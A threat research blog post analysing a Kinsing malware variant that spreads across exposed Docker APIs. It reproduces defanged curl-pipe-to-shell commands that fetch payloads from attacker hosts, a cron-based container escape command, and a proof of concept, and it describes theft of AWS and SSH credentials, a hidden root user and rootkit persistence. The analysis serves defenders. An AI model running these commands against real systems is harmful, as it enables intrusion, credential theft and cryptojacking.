Threat Research Blog
- Saturday 22 August 2020

Kinsing Punk: An Epic Escape From Docker Containers

We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads.

Today, it's déjà vu all over again. Only in the world of Linux.

As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer.

In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating.

Let's start from its simplest trick — the credentials grabber.

AWS Credentials Grabber

If you are using cloud services, chances are you may have used Amazon Web Services (AWS).

Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with Access key ID and Secret access key of the newly created IAM user.

You will then use those credentials to configure the AWS Command Line Interface (CLI) with the aws configure command.

From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using AWS CLI programmatically.

There is one little caveat, though.

AWS CLI stores your credentials in a clear text file called ~/.aws/credentials.

The documentation clearly explains that:

The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory.

That means, your cloud infrastructure is now as secure as your local computer.

It was a matter of time for the bad guys to notice such low-hanging fruit, and use it for their profit.

As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server.


For hosting, the malware relies on other compromised hosts.

For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM, vulnerable to exploits.

The attackers have compromised this server, installed a webshell b374k, and then uploaded several malicious files on it, starting from 11 July 2020.

A server at 129[.]211[.]98[.]236, where the worm hosts its own body, is a vulnerable Docker host.

According to Shodan, this server currently hosts a malicious Docker container image system_docker, which is spun with the following parameters:

./nigix --tls-url -u [MONERO_WALLET] -p x --currency monero --httpd 8080

A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of alpine container image:

chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver" > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/ | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver" > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/ | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/ | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/ | sh'

Docker Lan Pwner

A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts.

To understand the mechanism behind it, it's important to remember that a non-protected Docker host effectively acts as a backdoor trojan.

Configuring Docker daemon to listen for remote connections is easy. All it requires is one extra entry -H tcp:// in systemd unit file or daemon.json file.

Once configured and restarted, the daemon will expose port 2375 for remote clients:

$ sudo netstat -tulpn | grep dockerd
tcp        0      0*               LISTEN      16039/dockerd

To attack other hosts, the malware collects network segments for all network interfaces with the help of ip route show command. For example, for an interface with an assigned IP, the IP range of all available hosts on that network could be expressed in CIDR notation as

For each collected network segment, it launches masscan tool to probe each IP address from the specified segment, on the following ports:

Port Number Service Name Description
2375 docker Docker REST API (plain text)
2376 docker-s Docker REST API (ssl)
2377 swarm RPC interface for Docker Swarm
4243 docker Old Docker REST API (plain text)
4244 docker-basic-auth Authentication for old Docker REST API

The scan rate is set to 50,000 packets/second.

For example, running masscan tool over the CIDR block on port 2375, may produce an output similar to:

$ masscan -p2375 --rate=50000
Discovered open port 2375/tcp on

From the output above, the malware selects a word at the 6th position, which is the detected IP address.

Next, the worm runs zgrab — a banner grabber utility — to send an HTTP request "/v1.16/version" to the selected endpoint.

For example, sending such request to a local instance of a Docker daemon results in the following response:

Next, it applies grep utility to parse the contents returned by the banner grabber zgrab, making sure the returned JSON file contains either "ApiVersion" or "client version 1.16" string in it. The latest version if Docker daemon will have "ApiVersion" in its banner.

Finally, it will apply jq — a command-line JSON processor — to parse the JSON file, extract "ip" field from it, and return it as a string.

With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run Docker daemon, located in the same network segments as the victim.

For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script:

docker -H tcp://[IP_ADDRESS]:[PORT] run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "curl [MALICIOUS_SCRIPT] | bash; ..."

The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers.

We'll get down to this trick in a moment. For now, let's break down the instructions passed to the Docker daemon.

The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters:

  • --rm switch will cause Docker to automatically remove the container when it exits
  • -v /:/mnt is a bind mount parameter that instructs Docker runtime to mount the host's root directory / within the container as /mnt
  • chroot /mnt will change the root directory for the current running process into /mnt, which corresponds to the root directory / of the host
  • a malicious script to be downloaded and executed

Escaping From the Docker Container

The malicious script downloaded and executed within alpine container first checks if the user's crontab — a special configuration file that specifies shell commands to run periodically on a given schedule — contains a string "129[.]211[.]98[.]236":

crontab -l | grep -e "129[.]211[.]98[.]236" | grep -v grep

If it does not contain such string, the script will set up a new cron job with:

echo "setup cron"
    crontab -l 2>/dev/null
    echo "* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1"
) | crontab -

The code snippet above will suppress the no crontab for username message, and create a new scheduled task to be executed every minute.

The scheduled task consists of 2 parts: to download and execute the malicious script and to delete all scheduled tasks from the crontab.

This will effectively execute the scheduled task only once, with a one minute delay.

After that, the container image quits.

There are two important moments associated with this trick:

  • as the Docker container's root directory was mapped to the host's root directory /, any task scheduled inside the container will be automatically scheduled in the host's root crontab
  • as Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in the root's crontab, to be executed as root

Building PoC

To test this trick in action, let's create a shell script that prints "123" into a file _123.txt located in the root directory /.

echo "setup cron"
    crontab -l 2>/dev/null
    echo "* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1"
) | crontab -

Next, let's pass this script encoded in base64 format to the Docker daemon running on the local host:

docker -H tcp:// run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "echo '[OUR_BASE_64_ENCODED_SCRIPT]' | base64 -d | bash"

Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers:

$ docker -H tcp:// ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES

An important question now is if the crontab job was created inside the (now destroyed) docker container or on the host?

If we check the root's crontab on the host, it will tell us that the task was scheduled for the host's root, to be run on the host:

$ sudo crontab -l
 * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1

A minute later, the file _123.txt shows up in the host's root directory, and the scheduled entry disappears from the root's crontab on the host:

$ sudo crontab -l
no crontab for root

This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host.

By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host!

Malicious Script

Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions:

  • it will disable Aegis — a Security Center agent for Alibaba Cloud
  • it will collect system information and post it to C2 at http[://]sayhi[.]bplaced[.]net/uploads/index.php
    • Contents of the files:
      • /etc/passwd
      • /etc/hosts
    • List of running processes
    • List of open ports and the process that keep them open
    • List of files in the directories:
      • /root
      • /home
    • List of scheduled tasks
    • CPU information
  • it will kill other existing (competing) cryptomining services
  • it will download and install cryptominer — a MoneroOcean's XMRig fork — into /usr/share/[crypto]
  • the script will clone a GitHub repository of Diamorphine — a kernel-mode rootkit, compile it as diamorphine.ko ELF binary, and load it into kernel with insmod command to hide the cryptominer's process
  • it will create entries in the files /etc/passwd, /etc/shadow, and /etc/sudoers to register user hilde as a root
  • it will add a new hard-coded public RSA key for the user into /root/.ssh/authorized_keys and /root/.ssh/authorized_keys2, so that the user could authenticate with the compromised host's SSH server, using its own private key
  • it will delete any Docker containers that were launched with the following parameters:
    • /bin/bash
    • /root/
    • widoc26117/xmr
    • zbrtgwlxz
    • tail -f /dev/null

The Docker container widoc26117/xmr it deletes is a publicly available Docker image with 2.5 thousand downloads. An analysis of this image in the Prevasio's Dynamic Analysis Sandbox reveals it's a XMRig coinminer with the following visual graph of the system events:

According to an earliers post from Aqua Security, a container image "zbrtgwlxz" is a known container image built by the attackers directly on a misconfigured Docker host.

As per Shodan, the image "zbrtgwlxz" was found to be deployed over 29 compromised hosts, all located in China.

You've Been Punked

The malicious script also installs — an SSH post-exploitation tool.

When a user sets up SSH Keys to log to a remote host, the public key is deployed to the host, while the private key is stored in a local file /home/[USER]/.ssh/id_rsa.

Upon successful connection of the SSH client to the remote host, the authenticity of the host is established, and the hash of its IP address is saved into the known_hosts file.

Upon subsequent connections, the SSH client locates the hash of the remote host in the known_hosts file and no longer prompts the user to authenticate the remote host.

The post-exploitation tool allows red teams to extract IP addresses from the known_hosts file. It does so by enumerating all IP addresses from the arbitrary network ranges, then hashing each IP with SHA1, and checking if the calculated hash can be found in the known_hosts file.

The result of such brute-forcing allows the tool to recover the remote hosts that the given user has ever connected to from the compromised system.

Below is an example of the tool successfully recovering IP address from the known_hosts file, by enumerating all IPs from a CIDR block

$ python ./ -c

         \   |   /
    .     \  |  /    .
   .__  \ /     `./  
      `-        @|
     .-'`.  !!    -   -=[ - unix SSH post-exploitation 1337 tool
    '     `  !  __.'  -=[ by `r3vn` ( tw: @r3vnn )
          _)___(      -=[
[*] enumerating valid users with ssh keys...
[*] Cracking known hosts on /home/[USER]/.ssh/known_hosts...
[*] Found
[*] Done.
For each located remote host IP, the tool can then attempt to SSH to the remote host, using the private SSH key harvested from the local /home/[USER]/.ssh/id_rsa file. If the connection is successful, it can then run an arbitrary command on the remote host.

Even though this tool was designed for red teams, the attackers have apparently re-purposed it for their own fun and profit.

Once they find private SSH keys for any users or root on the compromised host, they install into /usr/bin/pu and then notify themselves by fetching a single pixel from service.

Once notified, the attackers will be able to SSH into the compromised system (the public SSH key of user is authorized), to run this tool and to use it for network pivoting from a compromised system into other hosts, further spreading the infection.


The analysis of this malware reveals a trail of script kiddies. Some of the tricks they use are smart, but overall, the nature of their coding is hectic, quick, designed for a quick hack and for a quick profit.

By compromising unsecured Docker hosts, the attackers seem to be interested in only one asset: the computing power of the hosts, the hardware.

These are good news.

The bad news is that such reckless hooliganism does not play well with the cloud production systems, especially if they run critical services.

A production system may potentially crumble not because of a deliberate nation-sponsored attack or an act of sabotage (this may happen as well), but because the kids may have hacked it, willing to make a few dollars worth of cryptocurrency.

We're yet to see what these script kiddies will grow into. Practice shows they normally grow pretty fast.
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